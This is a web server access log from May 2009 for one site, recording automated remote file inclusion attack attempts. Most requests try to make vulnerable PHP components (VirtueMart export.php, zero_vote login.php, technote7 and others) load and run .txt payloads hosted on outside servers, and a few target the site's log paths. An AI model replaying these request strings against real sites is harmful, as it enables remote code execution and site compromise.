204.11.53.20 - - [02/May/2009:06:08:53 -0700] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.wirama.com"
80.172.236.56 - - [02/May/2009:06:10:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:06:10:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:06:10:17 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
204.11.53.20 - - [02/May/2009:06:10:26 -0700] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
204.11.53.20 - - [02/May/2009:06:10:26 -0700] "GET /components/com_mambowiki/Mam***ogin.php?IP=http://sito.blackdrag0n.net/Cartoon/idnew.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "wirama.com"
200.103.16.43 - - [02/May/2009:06:14:03 -0700] "GET /logs/access_090401.log//skin/zero_vote/login.php?dir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:06:14:03 -0700] "GET /skin/zero_vote/login.php?dir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:06:14:03 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:06:14:13 -0700] "GET /logs/access_090401.log//skin/zero_vote/login.php?dir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:06:14:13 -0700] "GET /skin/zero_vote/login.php?dir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.103.16.43 - - [02/May/2009:06:14:13 -0700] "GET /logs//skin/zero_vote/login.php?dir=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
217.199.222.19 - - [02/May/2009:06:17:27 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:28 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:29 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:29 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:31 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.0" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:32 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:17:35 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:17:36 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:47 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:47 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:17:49 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
80.172.236.56 - - [02/May/2009:06:17:55 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:06:17:55 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
80.172.236.56 - - [02/May/2009:06:17:55 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mjswimgear.dk/joomla/media/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:17:57 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:28 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:28 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:37 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:38 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:38 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:52 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:52 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:18:52 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:19:02 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:19:05 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:19:17 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:20:09 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:20:10 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:20:19 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:20:56 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:22:47 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [02/May/2009:06:22:48 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [02/May/2009:06:22:58 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [02/May/2009:06:22:58 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
202.62.61.45 - - [02/May/2009:06:26:15 -0700] "GET /logs/access_090329.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:26:15 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:26:16 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
66.118.156.242 - - [02/May/2009:06:27:19 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.walkersgameear.com/email-bad/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.118.156.242 - - [02/May/2009:06:27:19 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.walkersgameear.com/email-bad/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
66.118.156.242 - - [02/May/2009:06:27:19 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.walkersgameear.com/email-bad/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:28:31 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:31 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:31 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:32 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:45 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:46 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:50 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:51 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:55 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:28:55 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:29:03 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
217.199.222.19 - - [02/May/2009:06:29:03 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "wirama.com"
62.204.145.214 - - [02/May/2009:06:31:18 -0700] "GET /errors.php?error=http://designchambers.com.hk/components/com_plugins? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
69.16.200.49 - - [02/May/2009:06:31:31 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.walkersgameear.com/email-bad/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.16.200.49 - - [02/May/2009:06:31:31 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.walkersgameear.com/email-bad/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
69.16.200.49 - - [02/May/2009:06:31:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.walkersgameear.com/email-bad/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:32:37 -0700] "GET /logs/access.log//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
74.6.17.163 - - [02/May/2009:06:33:47 -0700] "GET /logs/access_090501.log HTTP/1.0" 200 5490289 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:37:32 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:37:33 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:37:33 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:37:33 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:37:38 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
217.199.222.19 - - [02/May/2009:06:37:39 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
72.82.228.83 - - [02/May/2009:06:38:52 -0700] "GET /bbs//skin/zero_vote/login.php?dir=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:06:38:57 -0700] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:06:39:02 -0700] "GET /logs/access_090331.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:06:39:08 -0700] "GET /bbs//skin/zero_vote/login.php?dir=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.82.228.83 - - [02/May/2009:06:39:08 -0700] "GET /logs/access_090331.log%20%20//bbs//skin/zero_vote/login.php?dir=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:39:12 -0700] "GET /logs/access.log//?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
202.62.61.45 - - [02/May/2009:06:39:12 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.dj4000.or.kr/ppfk2005/data/idomila.txt?? HTTP/1.1" 200 916 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.wirama.com"
72.82.228.83 - - [02/May/2009:06:39:13 -0700] "GET /logs//bbs//skin/zero_vote/login.php?dir=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
200.32.100.130 - - [02/May/2009:06:58:36 -0700] "GET /login.php?dir=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:06:58:36 -0700] "GET /logs//login.php?dir=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
200.32.100.130 - - [02/May/2009:06:58:36 -0700] "GET /logs/access_090331.log//login.php?dir=http://www.xplxx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
208.80.195.27 - - [02/May/2009:07:09:11 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {11263ABF-81BB-4190-96AE-958C9F5EE836}; (R1 1.1))" "www.wirama.com"
62.204.145.214 - - [02/May/2009:07:12:41 -0700] "GET /index.php?DOCUMENT_ROOT=http://designchambers.com.hk/components/com_plugins? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.wirama.com"
218.185.20.88 - - [02/May/2009:07:18:15 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://detroitbargainhomes.com//administrator/components/com_acajoom/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.185.20.88 - - [02/May/2009:07:18:15 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://detroitbargainhomes.com//administrator/components/com_acajoom/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
